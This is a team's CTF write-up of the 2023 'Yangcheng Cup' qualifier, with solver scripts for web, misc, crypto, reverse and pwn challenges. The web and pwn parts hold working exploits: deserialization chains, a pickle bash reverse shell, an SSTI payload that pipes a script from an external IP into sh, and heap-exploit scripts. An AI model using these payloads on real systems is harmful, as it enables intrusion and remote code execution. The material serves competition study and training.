2023“羊城杯”网络安全大赛初赛-WriteUp By EDISEC

admin

102369
文章

87
评论

2023年9月9日16:20:56评论182 views字数 32900阅读109分40秒阅读模式

EDI

JOIN US ▶▶▶

Web

D0n't pl4y g4m3!!!

PHP<=7.4.21 Development Server源码泄露漏洞

https://cloud.tencent.com/developer/article/2235691

<?phpheader("HTTP/1.1 302 found");header("Location:https://passer-by.com/pacman/");
class Pro{    private $exp;    private $rce2;
    public function __get($name)    {        return $this->$rce2=$this->exp[$rce2];    }    public  function __toString()    {            call_user_func('system', "cat /flag");     }}
class Yang{    public function __call($name, $ary)    {        if ($this->key === true || $this->finish1->name) {            if ($this->finish->finish) {                call_user_func($this->now[$name], $ary[0]);            }        }    }    public function ycb()    {        $this->now = 0;        return $this->finish->finish;    }    public function __wakeup()    {        $this->key = True;    }}class Cheng{    private $finish;    public $name;    public function __get($value)    {
        return $this->$value = $this->name[$value];    }}class Bei{    public function __destruct()    {        if ($this->CTF->ycb()) {            $this->fine->YCB1($this->rce, $this->rce1);        }    }    public function __wakeup()    {        $this->key = false;    }}
function prohib($a){    $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";    return preg_replace($filter,'',$a);}
$a = $_POST["CTF"];if (isset($a)){  unserialize(prohib($a));}?>

hint.zip内容是

那么源码的call_user_func('system', "cat /flag");就是陷阱，出口应该是call_user_func($this->now[$name], $ary[0]);

构造反序列化链

入口是

Bei::__destruct

$this->CTF->ycb()进到ycb()

Cheng的$finish是private，调用__get，令finish=true

回到Bei

$this->fine->YCB1($this->rce, $this->rce1);调用了Yang中不存在的方法，触发__call并触发__wakeup令$this->key = True;通过if，执行命令。

payload：

O:3:"Bei":3:{s:4:"fine";O:4:"Yang":2:{s:6:"finish";O:5:"Cheng":2:{s:13:"x00Chengx00finish";N;s:4:"name";a:1:{s:6:"finish";s:4:"true";}}s:3:"now";a:1:{s:4:"YCB1";s:6:"syssystemtem";}}s:3:"rce";s:23:"cat /tmp/catcatf1ag.txt";s:3:"CTF";O:4:"Yang":1:{s:6:"finish";O:5:"Cheng":2:{s:13:"x00Chengx00finish";N;s:4:"name";a:1:{s:6:"finish";s:4:"true";}}}}

Ez_java

利用pojonode执行htmlbean中的getHtmlMap，在利用代理类代理HtmlMap，最后成功执行文件上传。

https://www.cnblogs.com/escape-w/p/17326592.html

将content设置为public String content = "<#assign ac=springMacroRequestContext.webApplicationContext>n" +           "  <#assign fc=ac.getBean('freeMarkerConfiguration')>n" +           "    <#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>n" +           "      <#assign VOID=fc.setNewBuiltinClassResolver(dcr)>${"freemarker.template.utility.Execute"?new()("cat /flag")}n";

exp

package com.ycbjava.test;import com.fasterxml.jackson.databind.node.POJONode;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import com.ycbjava.Bean.HtmlBean;import com.ycbjava.Utils.HtmlInvocationHandler;import com.ycbjava.Utils.HtmlMap;import javassist.ClassPool;import javassist.CtClass;import javassist.CtConstructor;import org.springframework.http.HttpEntity;import org.springframework.http.HttpHeaders;import org.springframework.http.ResponseEntity;import org.springframework.web.client.RestTemplate;
import javax.management.BadAttributeValueExpException;import java.io.*;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.lang.reflect.InvocationHandler;import java.lang.reflect.Proxy;import java.net.URI;import java.security.*;import java.util.Base64;import java.util.Map;
public class exp {    public static void main(String[] args) throws Exception {        HtmlMap expMap = new HtmlMap();        Class c = Class.forName("com.ycbjava.Utils.HtmlInvocationHandler");        Constructor annotationInvocationhdlConstructor = c.getDeclaredConstructor(Map.class);        annotationInvocationhdlConstructor.setAccessible(true);        InvocationHandler h = (InvocationHandler) annotationInvocationhdlConstructor.newInstance(expMap);//动态代理        Map mapProxy = (Map) Proxy.newProxyInstance(expMap.getClass().getClassLoader(),new Class[]{Map.class},h);
//        c = HtmlBean.class;//        Constructor constructor = c.getDeclaredConstructor(Map.class,String.class,String.class);//        constructor.setAccessible(true);//        HtmlBean templatesImpl = (HtmlBean) constructor.newInstance(mapProxy,"","");        HtmlMap tmpMap = new HtmlMap();        HtmlBean templatesImpl = new HtmlBean(tmpMap,"","");        templatesImpl.setHtmlMap(mapProxy);        POJONode jsonNodes = new POJONode(templatesImpl);        BadAttributeValueExpException exp = new BadAttributeValueExpException(null);        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");        val.setAccessible(true);        val.set(exp, jsonNodes);        ByteArrayOutputStream barr = new ByteArrayOutputStream();        ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);        objectOutputStream.writeObject(exp);        FileOutputStream fout = new FileOutputStream("1.ser");        fout.write(barr.toByteArray());        fout.close();        FileInputStream fileInputStream = new FileInputStream("1.ser");        System.out.println(serial(exp));        deserial(serial(exp));    }    public static String serial(Object o) throws IOException, NoSuchFieldException {        ByteArrayOutputStream baos = new ByteArrayOutputStream();        ObjectOutputStream oos = new ObjectOutputStream(baos);        oos.writeObject(o);        oos.close();
        String base64String = Base64.getEncoder().encodeToString(baos.toByteArray());        return base64String;
    }
    public static void deserial(String data) throws Exception {        byte[] base64decodedBytes = Base64.getDecoder().decode(data);        ByteArrayInputStream bais = new ByteArrayInputStream(base64decodedBytes);        ObjectInputStream ois = new ObjectInputStream(bais);        ois.readObject();        ois.close();    }
    private static void Base64Encode(ByteArrayOutputStream bs){        byte[] encode = Base64.getEncoder().encode(bs.toByteArray());        String s = new String(encode);        System.out.println(s);        System.out.println(s.length());    }    private static void setFieldValue(Object obj, String field, Object arg) throws Exception{        Field f = obj.getClass().getDeclaredField(field);        f.setAccessible(true);        f.set(obj, arg);    }}

HtmlMap

//// Source code recreated from a .class file by IntelliJ IDEA// (powered by FernFlower decompiler)//
package com.ycbjava.Utils;
import java.io.Serializable;import java.util.Collection;import java.util.Map;import java.util.Set;
public class HtmlMap implements Map, Serializable {   public String filename = "index.ftl";   public String content = "<#assign ac=springMacroRequestContext.webApplicationContext>n" +           "  <#assign fc=ac.getBean('freeMarkerConfiguration')>n" +           "    <#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>n" +           "      <#assign VOID=fc.setNewBuiltinClassResolver(dcr)>${"freemarker.template.utility.Execute"?new()("cat /flag")}n";
   public HtmlMap() {   }
   public int size() {      return 0;   }
   public boolean isEmpty() {      return false;   }
   public boolean containsKey(Object key) {      return false;   }
   public boolean containsValue(Object value) {      return false;   }
   public Object get(Object key) {      try {         Object obj = HtmlUploadUtil.uploadfile(this.filename, this.content);         return obj;      } catch (Exception var4) {         throw new RuntimeException(var4);      }   }
   public Object put(Object key, Object value) {      return null;   }
   public Object remove(Object key) {      return null;   }
   public void putAll(Map m) {   }
   public void clear() {   }
   public Set keySet() {      return null;   }
   public Collection values() {      return null;   }
   public Set<Map.Entry> entrySet() {      return null;   }}

Serpent

www.zip

伪造jwt

替换session后访问，下一步

看到hint

拿到源码

@app.route('/src0de')def src0de():    f = open(__file__, 'r')    rsp = f.read()    f.close()    return rsp[rsp.index("@app.route('/src0de')"):]
@app.route('/ppppppppppick1e')def ppppppppppick1e():    try:        username = "admin"        rsp = make_response("Hello, %s " % username)        rsp.headers['hint'] = "Source in /src0de"        pick1e = request.cookies.get('pick1e')        if pick1e is not None:            pick1e = base64.b64decode(pick1e)        else:            return rsp        if check(pick1e):            pick1e = pickle.loads(pick1e)            return "Go for it!!!"        else:            return "No Way!!!"    except Exception as e:        error_message = str(e)        return error_message
    return rsp
class GWHT():    def __init__(self):        pass
if __name__ == '__main__':    app.run('0.0.0.0', port=80)

构造pickle反序列化，拿到flag

payload：

import base64c = b'''(cossystemS'bash -c "bash -i >& /dev/tcp/123/777 0>&1"'o.'''print(base64.b64encode(c))

ezyaml

PyYaml反序列化打不通，发现tar解压可以目录穿越

payload：

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('curl http://139.159.163.195:8080/1|sh').read()") }}{% endif %}{% endfor %}

写反弹shell的payload

tar cPvf 5x.tar ../../templates/result.html

然后直接上传5x.tar

ArkNights

非预期，直接读/proc/1/environ

payload：

url/read?file=/proc/1/environ

Misc

ai和nia的交响曲

pcap包提取flag1.png和flag2.zip

flag1.png直接二进制转字符

flag1.png 二维码转01，然后转字符串

from PIL import Image
# 打开图像文件image = Image.open('./flag1.png')
# 将图像转换为RGB模式（如果不是的话）image = image.convert('RGB')
# 获取图像的宽度和高度width, height = image.size
# 遍历每个像素并获取其RGB值with open("flag.txt", "w") as f:    for y in range(height):        for x in range(width):            r, g, b = image.getpixel((y, x))            if r > 200:                f.write(f'1')            else:                f.write(f'0')

HINT:BV1wW4y1R7Jv&&FLAG1:@i_n1a_l0v3S_

flag2.zip是伪加密

解密后直接看txt中的数字对应HINT中视频的秒数

其实可以猜测出来为CAOCAOGAIFAN（曹操盖饭

flag: @i_n1a_l0v3S_CAOCAOGAIFAN

GIFUCK

获取图片后，先找个网站分离惹

根据特征像素写脚本获取字符

一开始直接跑brainfuck不行，后觉得应把 GIF图片时间间隔/60 x 字符类型统计为一串完整的字符。

from PIL import Imageimport matplotlibtime=[0,240,60,60,60,240,60,60,60,60,60,60,360,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,1860,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,180,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,180,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,120,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,120,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,180,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,120,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,60,60,60,60,180,60,180,60,60,120,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,120,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,180,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,120,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,120,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,180,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,540,60,60,60,540,60,60,60,120,60,60,300,60,60,60,300,60,60,60,180,60,180,120,420,60,60,540,60,60,60,540,60,60,60,480,60,60,480,60,60,60,480,60,60,60,120,60,60,240,60,60,60,240,60,60,60,180,60,60,60,60,540,60,60,60,540,60,60,60,180,60,60,540,60,60,60,540,60,60,60,480,60,60,180,60,60,60,180,60,60,60,60,60,360,60,180,60,60,540,60,60,60,540,60,60,60,60,60,60,480,60,60,60,480,60,60,60,360,60,360,60,60,180,60,60,60,180,60,60,60,120,60,360,60,60,480,60,60,60,480,60,60,60,420,60,60,480,60,60,60,480,60,60,60,540,60,60,180,60,60,60,180,60,60,60,60,60,60,540,60,60,60,540,60,60,60,120,60,60,480,60,60,60,480,60,60,60,840,60,60,60,300,60,60,540,60,60,60,540,60,60,60,180,60,60,480,60,60,60,480,60,60,60,480,60,180,60,60,180,60,60,60,180,60,60,60,240,60,60,180,60,60,60,180,60,60,60,240,60,60,420,60,60,60,420,60,60,60,360,60,60,60,60,60]c=""print(len(time))for i in range(1,1100):    img=Image.open("flag_{}.jpeg".format(i))    if(img.getpixel((20,12))[0]==0 and img.getpixel((20,12))[1]==0 and img.getpixel((20,12))[2]==0):        c+='['*(time[i]//60)    elif(img.getpixel((26,12))[0]==0 and img.getpixel((26,12))[1]==0 and img.getpixel((26,12))[2]==0):        c+="]"*(time[i]//60)    elif (img.getpixel((31,15))[0] == 0 and img.getpixel((31,15))[1] == 0 and img.getpixel((31,15))[2] == 0):        c += "<"*(time[i]//60)    elif(img.getpixel((16,14))[0]==0 and img.getpixel((16,14))[1]==0 and img.getpixel((16,14))[2]==0):        c+=">"*(time[i]//60)    elif(img.getpixel((16,24))[0]==0 and img.getpixel((16,24))[1]==0 and img.getpixel((16,24))[2]==0 and img.getpixel((24,18))[0]==0 and img.getpixel((24,18))[1]==0 and img.getpixel((24,18))[2]==0):        c+="+"*(time[i]//60)    elif(img.getpixel((25,25))[0]==0 and img.getpixel((25,25))[1]==0 and img.getpixel((25,25))[2]==0 and img.getpixel((30,23))[0]==0 and img.getpixel((30,23))[1]==0 and img.getpixel((30,23))[2]==0):        c+="-"*(time[i]//60)    else:        c+='.'*(time[i]//60)print(c)print(len(c))

则提取出完整的brainfuck代码，但是提示

“Sorry flag is not here”

猜测存在栈上（此处@2021长城杯Misc[你这flag保熟吗]

在正常字符前下断点

用Esoteric IDE跑即得到flag

DASCTF{Pen_Pineapple_Apple_Pen}

Easy_VMDK

1、根据题目提示，压缩包压缩了，但是没有变小，说明是仅存储压缩，其次，vmdk数据包前12个字节刚好是固定的，所以可以用明文攻击进行爆破密钥。

2、爆破出密钥

[ e6a73d9f 21ccfdbc f3e0c61c ]

3、将vmdk拖到取证工具一把梭，得到一个key.txt和一个flag.zip

4、flag.zip中藏了一个zip里面内容是

5、根据所给脚本写逆回去的脚本，得到压缩包密码

import cv2import base64import binasciiimport numpy as np
height, width = 137, 2494image = np.zeros((width, height, 3), dtype=np.uint8)print(image.shape)

r = 0 # 137c = 0 # 2494
with open("key.txt", "r") as f:    lines = f.readlines()    print(len(lines))    for line in lines:        text = base64.b64decode(line.strip())        img = binascii.b2a_uu(text).strip().decode().split(", ")        rgb_values = [int(x) for x in img]        rgb_tuple = tuple(rgb_values)        print(rgb_tuple)        image[c, r] = rgb_tuple        c += 1        if c == 2494:            r += 1            c = 0        if r > 137:            break        # print(img)
cv2.imwrite("key.png", image)

HELLO_DASCTF2023_WORLD

6、得到flag

ez_misc

window11截图漏洞

crc爆破，修改长宽

github下载工具，放入工具。

Crypto

MCeorpkpleer

部分p+超递增背包

from sage.numerical.knapsack import Superincreasing
p = 139540788452365306201344680691061363403552933527922544113532931871057569249632300961012384092481349965600565669315386312075890938848151802133991344036696488204791984307057923179655351110456639347861739783538289295071556484465877192913103980697449775104351723521120185802327587352171892429135110880845830815744n = 22687275367292715121023165106670108853938361902298846206862771935407158965874027802803638281495587478289987884478175402963651345721058971675312390474130344896656045501040131613951749912121302307319667377206302623735461295814304029815569792081676250351680394603150988291840152045153821466137945680377288968814340125983972875343193067740301088120701811835603840224481300390881804176310419837493233326574694092344562954466888826931087463507145512465506577802975542167456635224555763956520133324723112741833090389521889638959417580386320644108693480886579608925996338215190459826993010122431767343984393826487197759618771c = 156879727064293983713540449709354153986555741467040286464656817265584766312996642691830194777204718013294370729900795379967954637233360644687807499775502507899321601376211142933572536311131955278039722631021587570212889988642265055045777870448827343999745781892044969377246509539272350727171791700388478710290244365826497917791913803035343900620641430005143841479362493138179077146820182826098057144121231954895739989984846588790277051812053349488382941698352320246217038444944941841831556417341663611407424355426767987304941762716818718024107781873815837487744195004393262412593608463400216124753724777502286239464pubkey = [18143710780782459577, 54431132342347378731, 163293397027042136193, 489880191081126408579, 1469640573243379225737, 4408921719730137677211, 13226765159190413031633, 39680295477571239094899, 119040886432713717284697, 357122659298141151854091, 1071367977894423455562273, 3214103933683270366686819, 9642311801049811100060457, 28926935403149433300181371, 86780806209448299900544113, 260342418628344899701632339, 781027255885034699104897017, 2343081767655104097314691051, 7029245302965312291944073153, 21087735908895936875832219459, 63263207726687810627496658377, 189789623180063431882489975131, 569368869540190295647469925393, 1708106608620570886942409776179, 601827224419797931380408071500, 1805481673259393794141224214500, 893952418336266652976851386463, 2681857255008799958930554159389, 3523079163584485147344841221130, 1524252287869625983140881149316, 50264262166963219975822190911, 150792786500889659927466572733, 452378359502668979782399718199, 1357135078508006939347199154597, 4071405235524020818041597463791, 3169230503688232995231149877299, 462706308180869526799807117823, 1388118924542608580399421353469, 4164356773627825741198264060407, 3448085117999647764701149667147, 1299270151115113835209806487367, 3897810453345341505629419462101, 2648446157152195057994615872229, 3422845870014670444537026359650, 1223552407160181874717436564876, 3670657221480545624152309694628, 1966986461557807413563286569810, 1378466783231507511243038452393, 4135400349694522533729115357179, 3361215846199738142293703557463, 1038662335715384967987468158315, 3115987007146154903962404474945, 302975818554635252993570910761, 908927455663905758980712732283, 2726782366991717276942138196849, 3657854499533237101379593333510, 1928578295715881845245137486456, 1263242285705730806288591202331, 3789726857117192418865773606993, 2324195368467747797703678306905, 2450093503961328663664213663678, 2827787910442071261545819733997, 3960871129884299055190637944954, 2837628186769067706678271320788]en_e = 31087054322877663244023458448558
PR.<x>=Zmod(n)[]f=p+xps=f.small_roots(X=2^435,beta=0.4)[0]p=p+ZZ(ps)q=n//p
w=pubkey[0]m=pubkey[23]*3-pubkey[24]e_sum=inverse_mod(w,m)*en_e%mL = [pow(3, i) for i in range(len(pubkey))]s=Superincreasing(L).subset_sum(e_sum)e_bin=''for i in L:    if i in s:        e_bin+='1'    else:        e_bin+='0'
e=int(e_bin,2)d=inverse_mod(e,(p-1)*(q-1))m=pow(c,d,n)print(bytes.fromhex(hex(m)[2:]))

Easy_3L

from Crypto.Util.number import *

S1 = 28572152986082018877402362001567466234043851789360735202177142484311397443337910028526704343260845684960897697228636991096551426116049875141S2 = 1267231041216362976881495706209012999926322160351147349200659893781191687605978675590209327810284956626443266982499935032073788984220619657447889609681888S4 = 9739918644806242673966205531575183334306589742344399829232076845951304871478438938119813187502023845332528267974698273405630514228632721928260463654612997S5 = 9755668823764800147393276745829186812540710004256163127825800861195296361046987938775181398489372822667854079119037446327498475937494635853074634666112736p = 25886434964719448194352673440525701654705794467884891063997131230558866479588298264578120588832128279435501897537203249743883076992668855905005985050222145380285378634993563571078034923112985724204131887907198503097115380966366598622251191576354831935118147880783949022370177789175320661630501595157946150891275992785113199863734714343650596491139321990230671901990010723398037081693145723605154355325074739107535905777351h = 2332673914418001018316159191702497430320194762477685969994411366563846498561222483921873160125818295447435796015251682805613716554577537183122368080760105458908517619529332931042168173262127728892648742025494771751133664547888267249802368767396121189473647263861691578834674578112521646941677994097088669110583465311980605508259404858000937372665500663077299603396786862387710064061811000146453852819607311367850587534711c = 20329058681057003355767546524327270876901063126285410163862577312957425318547938475645814390088863577141554443432653658287774537679738768993301095388221262144278253212238975358868925761055407920504398004143126310247822585095611305912801250788531962681592054588938446210412897150782558115114462054815460318533279921722893020563472010279486838372516063331845966834180751724227249589463408168677246991839581459878242111459287
M=matrix(ZZ,2,2)M[0,0]=1M[0,1]=hM[1,1]=pf,q=M.LLL()f=abs(f)q=abs(q)
f=2958625475884682403405014470761000210086580211925778089178918430815532447031463283614057163768060620823591903413541344968843101811848989638106999025589699093227724370590844533541264661014288260713331275996479822           q=143265706312185518707360965653484385997990911723976280223660311623608293086933108010191106789268178340653420902857329654860207182679342550588469606976658133500469022125616655674540322895098388733565812347250745a=(c*f%p)S3=inverse_mod(f,q)*a%qS3=ZZ(S3)
t1=S2-S1t2=S3-S2t3=S4-S3t4=S5-S4
n=GCD(t1*t3-t2^2,t2*t4-t3^2)a=t2*inverse_mod(t1,n)%na=ZZ(a)b=ZZ((S2-a*S1)%n)
S0=(S1-b)*inverse_mod(a,n)%nprint(long_to_bytes(S0))

Danger_RSA

from Crypto.Util.number import *import sympyimport gmpy2
N = 20289788565671012003324307131062103060859990244423187333725116068731043744218295859587498278382150779775620675092152011336913225797849717782573829179765649320271927359983554162082141908877255319715400550981462988869084618816967398571437725114356308935833701495015311197958172878812521403732038749414005661189594761246154666465178024563227666440066723650451362032162000998737626370987794816660694178305939474922064726534186386488052827919792122844587807300048430756990391177266977583227470089929347969731703368720788359127837289988944365786283419724178187242169399457608505627145016468888402441344333481249304670223e = 11079917583c = 13354219204055754230025847310134936965811370208880054443449019813095522768684299807719787421318648141224402269593016895821181312342830493800652737679627324687428327297369122017160142465940412477792023917546122283870042482432790385644640286392037986185997262289003477817675380787176650410819568815448960281666117602590863047680652856789877783422272330706693947399620261349458556870056095723068536573904350085124198592111773470010262148170379730937529246069218004969402885134027857991552224816835834207152308645148250837667184968030600819179396545349582556181916861808402629154688779221034610013350165801919342549766s=21 * 5741t=e//s
XY=gmpy2.iroot(N,4)[0]a=N-XY**4-ex=sympy.Symbol('x')r=sympy.solve([t*x**8-a*x**4+s*XY**4],[x])X=r[1][0]p=int(X**4+s)d=inverse(e,p-1)m=pow(c,int(d),p)print(e*d%(p-1))

PR.<x>=GF(p)[]f=x^3-mfor i in f.roots():    print(long_to_bytes(ZZ(i[0])))

XOR贯穿始终

找到n和d分别是证书16进制前两次02 81 81后的0x81个字节

from Crypto.Util.number import *from pwn import *
n=0x00B9AD332FB6B87D59B5B20B4AE880BA416D8724111F99A9ED498BCB365091D83DCC43FDFF9B607DF8A443BCADC79907C921E76B38003B5B0ECE660437803195EBFAB9A7E23FC0751228FDEEFE5591827523D7B79AD04D85E4DB5CAA13F28A7E0124357D0685E00F14CCBB9679979923C2531FF487F9BA2500ADE48995C315D913d=0x00974EBB2DA0BB0AFB3603970C3E17D8B044AF22070A3750B05B849DDEEF1D4A986182EED3832CC8BAFC316EEA36835042E96C0A85A23ABC637E72C7F0EA787DF06127FE9DC3D21B8DAE8018BDFFC345107D5271DDB6D5FBC01F8CBF73F44410D61E006208356F1C5B85515EFC708B34B676E78F18D4D3B68F5765D10B701F0361e=65537c = 91817924748361493215143897386603397612753451291462468066632608541316135642691873237492166541761504834463859351830616117238028454453831120079998631107520871612398404926417683282285787231775479511469825932022611941912754602165499500350038397852503264709127650106856760043956604644700201911063515109074933378818m=pow(c,d,n)m=long_to_bytes(m)key=b'C0ngr4tulati0n5_y0u_fou^d_m3'print(m[:-28]+xor(key,m[-28:]))

blast

md5(md5($pass))

CSGO

BASE64换表动调

ez加密器

import base64import structfrom Crypto.Cipher import DESraw_table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='new_table = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/='dictionary_decode = str.maketrans(new_table, raw_table)dictionary_encode = dict(zip(dictionary_decode.values(),dictionary_decode.keys()))ciphertext = bytes.fromhex('0723105D5C12217DCDC3601F5ECB54DA9CCEC2279F1684A13A0D716D17217F4C9EA85FF1A42795731CA3C55D3A4D7BEA')for i in range(999999):    result_b64 = base64.b64encode(str(i).encode()).decode()    new_result_b64 = result_b64.translate(dictionary_encode)    key = new_result_b64[:8]    if len(key) >= 8:        try:             cipher = DES.new(key.encode(), DES.MODE_ECB)            plaintext = cipher.decrypt(ciphertext)            if "DASCTF" in plaintext.decode():                print(plaintext)                break        except:            continueDASCTF{f771b96b71514bb6bc20f3275fa9404e}

vm_wo

整体加密就是异或0x2b，整体左移1位 + 1，比较好猜。

Pwn

cookieBox

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./cookieBox'#context.arch='amd64'while True :  # try :    elf=ELF(elfelf)    context.arch=elf.arch
    gdb_text='''      telescope $rebase(0x202040) 16      '''
    if len(sys.argv)==1 :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=process(elfelf)      gdb_open=1      # io=process(['./'],env={'LD_PRELOAD':'./'})      clibc.srand(clibc.time(0))      libc=ELF('/musl/1.1.24/amd64/lib/libc.so')      # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :      clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')      io=remote('tcp.cloud.dasctf.com',24659)      gdb_open=0      clibc.srand(clibc.time(0))      libc=ELF('./libc.so')      # ld = ELF('/lib/x86_64-linux-gnu/ld.so.6')      one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    def gdb_attach(io,a):      if gdb_open==1 :        gdb.attach(io,a)
    def choice(a):      io.sendlineafter('>>',str(a))
    def add(a,b):      choice(1)      io.sendlineafter('size:n',str(a))      io.sendafter('Content:n',b)      def edit(a,b):      choice(3)      io.sendlineafter('idx:n',str(a))      io.sendafter('content:n',b)
    def show(a):      choice(4)      io.sendlineafter('idx:n',str(a))
    def delete(a):      choice(2)      io.sendlineafter('idx:n',str(a))
    add(0x40,'aaaaaaaa')    add(0x40,'aaaaaaaa')    add(0x40,'aaaaaaaa')    add(0x40,'aaaaaaaa')    add(0x90,'aaaaaaaa')    delete(2)    add(0x40,'aaaaaaaa')    show(5)
    libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['mal']-0x30    libc.address=libc_base    bin_sh_addr=libc.search('/bin/shx00').next()    system_addr=libc.sym['system']    pop_rax_ret=libc.search(asm('pop rax;ret')).next()    pop_rdi_ret=libc.search(asm('pop rdi;ret')).next()    pop_rsi_ret=libc.search(asm('pop rsi;ret')).next()    pop_rdx_ret=libc.search(asm('pop rdx;ret')).next()    syscall_ret=libc.search(asm('syscall;ret')).next()
    delete(2)    edit(5,p64(0x602070)+p64(0x602070+8))    delete(3)    edit(5,p64(libc.sym['__stdout_FILE'])*2)    fake_file = ""    fake_file += "/bin/sh".ljust(8, 'x00')  # flags    fake_file += p64(0)  # rpos    fake_file += p64(0)  # rend    fake_file += p64(0)  # close    fake_file += p64(0)  # wend    fake_file += p64(114514)  # wpos    fake_file += p64(0)  # mustbezero_1    fake_file += p64(1919810)  # wbase    fake_file += p64(0)  # read    fake_file += p64(system_addr)  # write
    edit(4,fake_file)

        success('libc_base:'+hex(libc_base))    # success('heap_base:'+hex(heap_base))
    gdb_attach(io,gdb_text)    io.interactive()
  # except Exception as e:  #   io.close()  #   continue  # else:  #   continue

easy_vm

#coding:utf-8from pwn import *
context.log_level='debug'elfelf='./pwn'elf=ELF(elfelf)context.arch=elf.archgdb_text='''b exit  '''
if len(sys.argv)==1 :  io=process(elfelf)  gdb_open=1  libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
elif sys.argv[1]=='2' :  io=process(elfelf)  gdb_open=0  libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
else :  io=remote('tcp.cloud.dasctf.com',24486)  gdb_open=0  libc=ELF('./libc-2.23.so')  one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
def gdb_attach(io,a):  if gdb_open==1 :    gdb.attach(io,a)    sleep(0.2)
def pop():  return p64(2)
def push():  return p64(1)
def mov():  return p64(3)
def data_add(a):  return p64(6)+p64(a)
def data_sub(a):  return p64(7)+p64(a)


bin_sh_addr=libc.search('/bin/shx00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']pop_rax_ret=libc.search(asm('pop rax;ret')).next()pop_rdi_ret=libc.search(asm('pop rdi;ret')).next()pop_rsi_ret=libc.search(asm('pop rsi;ret')).next()pop_rdx_ret=libc.search(asm('pop rdx;ret')).next()syscall_ret=libc.search(asm('syscall;ret')).next()

gdb_attach(io,gdb_text)pay=pop()+push()*4+data_sub(libc.sym['__malloc_hook']+0x10+88)+push()pay+=data_add(0xf1147)+push()+data_add(0x5abbb8+system_addr-0xf1147)+mov()pay+=pop()



io.recv()io.send(pay)

io.interactive()

shellcode

通过已有0x10长度的shellcode，完成二次read，而后再构造orw，来绕过沙箱。

